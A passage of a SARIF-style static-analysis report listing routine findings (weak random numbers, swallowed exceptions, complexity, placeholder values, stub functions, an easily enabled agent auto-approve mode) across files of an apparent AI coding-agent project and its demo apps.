"message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 46493, "scanner": "repobility-threat-engine", "fingerprint": "78761b6d61dcefa4bf924fc4c169c17b01b704563a8132c6421f7a9f0d84c329", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def create_code_session", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|68|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/code_session_api.py"}, "region": {"startLine": 68}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 46487, "scanner": "repobility-threat-engine", "fingerprint": "3acbd81821688ec8ab3b6f114ebff3209df9bc0bb34fbb11fce7ebf35007dc73", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3acbd81821688ec8ab3b6f114ebff3209df9bc0bb34fbb11fce7ebf35007dc73"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/gemini.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 46486, "scanner": "repobility-threat-engine", "fingerprint": "2aaa4f4df29079322d04847e6f1786d18c847b2183527a2d9ac90862def467b4", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|2aaa4f4df29079322d04847e6f1786d18c847b2183527a2d9ac90862def467b4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/aws.py"}, "region": {"startLine": 55}}}]}, {"ruleId": "ERR001", "level": "warning", "message": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "properties": {"repobilityId": 46485, "scanner": "repobility-threat-engine", "fingerprint": "92a5efd4156863d3580f9a1b13232c5067b9d3a92980ce403f0b1ae6e39a7f85", "category": "error_handling", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "except Exception:\n pass", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|92a5efd4156863d3580f9a1b13232c5067b9d3a92980ce403f0b1ae6e39a7f85"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 85}}}]}, {"ruleId": "COMP001", "level": "warning", "message": {"text": "[COMP001] High cognitive complexity: Function `main` has cognitive complexity 18 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: continue=2, for=3, if=4, nested_bonus=9."}, "properties": {"repobilityId": 46462, "scanner": "repobility-threat-engine", "fingerprint": "7112e57f9fca481f2f31402be7bb97a64725ec0d660c65b7578ccb69a55d022f", "category": "quality", "severity": "medium", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 18 (severity threshold for medium: 15+).", "evidence": {"scanner": "repobility-threat-engine", "function": "main", "breakdown": {"if": 4, "for": 3, "continue": 2, "nested_bonus": 9}, "complexity": 18, "correlation_key": "fp|7112e57f9fca481f2f31402be7bb97a64725ec0d660c65b7578ccb69a55d022f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/_clear_infra_errors.py"}, "region": {"startLine": 38}}}]}, {"ruleId": "SEC134", "level": "warning", "message": {"text": "[SEC134] AI scaffold leftover \u2014 Lorem ipsum / example.com / John Doe in code: Lorem ipsum / John Doe / example.com left in non-test code. AI agents emit these as 'reasonable defaults' when they don't know real values; the human then forgets to swap them. In production, these break demo flows, send mail to a real example.com host (it's owned by IANA), and leak that the codebase had an AI scaffolding pass."}, "properties": {"repobilityId": 46456, "scanner": "repobility-threat-engine", "fingerprint": "245e892ba5e0da685a2977a75f90990aa51762dd3cd8f0ada80cc068aed0b80f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "'Acme Corp'", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC134", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|245e892ba5e0da685a2977a75f90990aa51762dd3cd8f0ada80cc068aed0b80f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "demos/crm-app/src/context/CRMContext.jsx"}, "region": {"startLine": 7}}}]}, {"ruleId": "SEC087", "level": "warning", "message": {"text": "[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes concept (Apache-2.0)."}, "properties": {"repobilityId": 46455, "scanner": "repobility-threat-engine", "fingerprint": "835fbfcff32e58532de352ffc023bdbaad88ee775a4bc69e3f3c8bb14df0c4f2", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "Math.random() > 0.6) continue;\n const key", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC087", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|835fbfcff32e58532de352ffc023bdbaad88ee775a4bc69e3f3c8bb14df0c4f2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "demos/minecraft-app/src/utils/terrain.js"}, "region": {"startLine": 86}}}]}, {"ruleId": "SEC087", "level": "warning", "message": {"text": "[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes concept (Apache-2.0)."}, "properties": {"repobilityId": 46454, "scanner": "repobility-threat-engine", "fingerprint": "d06a6fdaabc05567d4d5f180fafc7bfc6c9b9316687715620b2d6b9d9b2ecbe9", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "ived = offerPets[Math.floor(Math.random(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC087", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d06a6fdaabc05567d4d5f180fafc7bfc6c9b9316687715620b2d6b9d9b2ecbe9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "demos/adopt-me-app/src/pages/Trade.jsx"}, "region": {"startLine": 31}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 46453, "scanner": "repobility-agent-runtime", "fingerprint": "4a2325f8a7bce63c5a0d6331f60d181868aa0fb0bb10413b779cbcbe0a5a8cf7", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|4a2325f8a7bce63c5a0d6331f60d181868aa0fb0bb10413b779cbcbe0a5a8cf7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/headless.py"}, "region": {"startLine": 18}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46446, "scanner": "repobility-ast-engine", "fingerprint": "5ae4a873f1c542447bb67f5d1363451a883bbd73b700d90de07a99bf4071b451", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5ae4a873f1c542447bb67f5d1363451a883bbd73b700d90de07a99bf4071b451"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/renderers.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46445, "scanner": "repobility-ast-engine", "fingerprint": "8655bf849f1c4c5c72f6e467f2f6cdd217167c713b30d07d2b017d09a50fd7a5", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8655bf849f1c4c5c72f6e467f2f6cdd217167c713b30d07d2b017d09a50fd7a5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/renderers.py"}, "region": {"startLine": 71}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46443, "scanner": "repobility-ast-engine", "fingerprint": "3cb0918134588ba05c6f1ab7ac32e1536ce3ace210f15f26d72781e5b60b16b8", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3cb0918134588ba05c6f1ab7ac32e1536ce3ace210f15f26d72781e5b60b16b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/registry.py"}, "region": {"startLine": 169}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46442, "scanner": "repobility-ast-engine", "fingerprint": "580b62399bf5d159e736ca3ae44daaa1cb2e2161f265aaa010dbe0d5a96049e5", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|580b62399bf5d159e736ca3ae44daaa1cb2e2161f265aaa010dbe0d5a96049e5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/loader.py"}, "region": {"startLine": 1174}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46441, "scanner": "repobility-ast-engine", "fingerprint": "9d1ef6c7b408aabff9e6fe17bc9c35e42a3f738424835a551b64b2a0f3223c5f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9d1ef6c7b408aabff9e6fe17bc9c35e42a3f738424835a551b64b2a0f3223c5f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/loader.py"}, "region": {"startLine": 563}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46440, "scanner": "repobility-ast-engine", "fingerprint": "094c34ecf254c77eb37e57d61b62587e3664310ed2f421a6c04b7f2921fe74ad", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|094c34ecf254c77eb37e57d61b62587e3664310ed2f421a6c04b7f2921fe74ad"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/loader.py"}, "region": {"startLine": 1168}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46439, "scanner": "repobility-ast-engine", "fingerprint": "1215ec6a50e658a85cfb6339ae60d2b3a54c6f1263c7e701255ee2cf6de3fb43", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1215ec6a50e658a85cfb6339ae60d2b3a54c6f1263c7e701255ee2cf6de3fb43"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/loader.py"}, "region": {"startLine": 273}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46438, "scanner": "repobility-ast-engine", "fingerprint": "9d064bf0cdd0d93611fcddbbbb988d73bd41977c7d11db1ae9d5e444be975db6", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9d064bf0cdd0d93611fcddbbbb988d73bd41977c7d11db1ae9d5e444be975db6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/loader.py"}, "region": {"startLine": 168}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46437, "scanner": "repobility-ast-engine", "fingerprint": "3d2763c8cbd53313cc60a6bbefc945a24b3fe44abbf89232c896ea697c07e9a4", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3d2763c8cbd53313cc60a6bbefc945a24b3fe44abbf89232c896ea697c07e9a4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/skills/argument_substitution.py"}, "region": {"startLine": 13}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46436, "scanner": "repobility-ast-engine", "fingerprint": "5695625cd13664862899176412c233b0e9d40cc48d70fe6025a04dd092b3e3c7", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5695625cd13664862899176412c233b0e9d40cc48d70fe6025a04dd092b3e3c7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/session_runner.py"}, "region": {"startLine": 810}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46435, "scanner": "repobility-ast-engine", "fingerprint": "b62d1f6ce2b4f3a4879a19e261bf78fd0299521cd2f56e3ff13b3fb35086ef6d", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b62d1f6ce2b4f3a4879a19e261bf78fd0299521cd2f56e3ff13b3fb35086ef6d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/session_runner.py"}, "region": {"startLine": 739}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46434, "scanner": "repobility-ast-engine", "fingerprint": "4679dad85f858b173796c8009fb746261f05aad6678b3d1713baea5ed35e0580", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4679dad85f858b173796c8009fb746261f05aad6678b3d1713baea5ed35e0580"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/session_runner.py"}, "region": {"startLine": 795}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46433, "scanner": "repobility-ast-engine", "fingerprint": "65583ba8b9cdeb901467198fd1883db72b45b8c57c5886f52dff65fa6accc232", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|65583ba8b9cdeb901467198fd1883db72b45b8c57c5886f52dff65fa6accc232"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/debug_utils.py"}, "region": {"startLine": 109}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46432, "scanner": "repobility-ast-engine", "fingerprint": "70b0db6baae18198b20ec4a66999fc710a1f642dc4f3ebcabaf93ddeb2ab4543", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|70b0db6baae18198b20ec4a66999fc710a1f642dc4f3ebcabaf93ddeb2ab4543"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/plugins/loader.py"}, "region": {"startLine": 46}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46426, "scanner": "repobility-ast-engine", "fingerprint": "73cff8d32501aba89093445a10f0d623e203cdfea11084b89e877cd3dc480fd9", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|73cff8d32501aba89093445a10f0d623e203cdfea11084b89e877cd3dc480fd9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_startup_profiler.py"}, "region": {"startLine": 178}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46424, "scanner": "repobility-ast-engine", "fingerprint": "4455faed753a346e7b4c30519e29446e056ff0c332f503df4394dcb843bf39cf", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4455faed753a346e7b4c30519e29446e056ff0c332f503df4394dcb843bf39cf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_headless_sigint.py"}, "region": {"startLine": 409}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46380, "scanner": "repobility-ast-engine", "fingerprint": "081ccc6beba60b4fc8a33398967795f419d7547a1bd661bc0fac788bfadb16aa", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|081ccc6beba60b4fc8a33398967795f419d7547a1bd661bc0fac788bfadb16aa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/run_compare.py"}, "region": {"startLine": 324}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46379, "scanner": "repobility-ast-engine", "fingerprint": "4f42093aca848c34e2d202c42918fce9670bde54412df141ceae33ba94acb86d", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4f42093aca848c34e2d202c42918fce9670bde54412df141ceae33ba94acb86d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/run_compare.py"}, "region": {"startLine": 254}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46378, "scanner": "repobility-ast-engine", "fingerprint": "5c025c3ed59c1d5507ef80465ceda3f0e132ebc9b4f9fbe5dbc9702c29ebd8ab", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5c025c3ed59c1d5507ef80465ceda3f0e132ebc9b4f9fbe5dbc9702c29ebd8ab"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.py"}, "region": {"startLine": 537}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46376, "scanner": "repobility-ast-engine", "fingerprint": "7456bb2511a23cdd70f8c01e67df64d0f7022af066d7602d120f7886d74d5f5c", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|7456bb2511a23cdd70f8c01e67df64d0f7022af066d7602d120f7886d74d5f5c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 252}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46375, "scanner": "repobility-ast-engine", "fingerprint": "b743355cd28ab8a6651bc5b599f83fa4ae817f6374ac70a15322d91103f80a4c", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b743355cd28ab8a6651bc5b599f83fa4ae817f6374ac70a15322d91103f80a4c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 394}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46374, "scanner": "repobility-ast-engine", "fingerprint": "a2696d763f91f5f31c28cdd46c5f75476b72e8dfbf2da569e86eed07535c3c9b", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a2696d763f91f5f31c28cdd46c5f75476b72e8dfbf2da569e86eed07535c3c9b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/token_estimation.py"}, "region": {"startLine": 36}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46373, "scanner": "repobility-ast-engine", "fingerprint": "2a8788915c74d52dc496166e925ab6889f33fc7078782dbe578dd867f8499859", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2a8788915c74d52dc496166e925ab6889f33fc7078782dbe578dd867f8499859"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 255}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46372, "scanner": "repobility-ast-engine", "fingerprint": "3d0798468ee5e3d3a3aca67537d081752934454394e9fded190a86e2b01989cf", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3d0798468ee5e3d3a3aca67537d081752934454394e9fded190a86e2b01989cf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 137}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 46363, "scanner": "repobility-ast-engine", "fingerprint": "004eb714db82fb1f3d50f0db4ae05884b4ab83b711b8afe803e70da023f9a526", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|004eb714db82fb1f3d50f0db4ae05884b4ab83b711b8afe803e70da023f9a526"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/__init__.py"}, "region": {"startLine": 10}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21228, "scanner": "repobility", "fingerprint": "aa00afacac4abb0dc17eae228c2fc350", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def request(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/lsp.py"}, "region": {"startLine": 12}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21227, "scanner": "repobility", "fingerprint": "5119bee979a544bfe8b3a6cf20ba199e", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def read_resource(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/mcp_resources.py"}, "region": {"startLine": 14}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21226, "scanner": "repobility", "fingerprint": "7fe21c9f0f7a05f0d77a81b222bdc120", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def list_resources(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/mcp_resources.py"}, "region": {"startLine": 13}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21225, "scanner": "repobility", "fingerprint": "0fb375a1e520540d4a8a6a8c1b6a300e", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def list_tools(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/mcp.py"}, "region": {"startLine": 30}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21224, "scanner": "repobility", "fingerprint": "d53cdfddb315cf7d66458eed73ecfd2f", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": 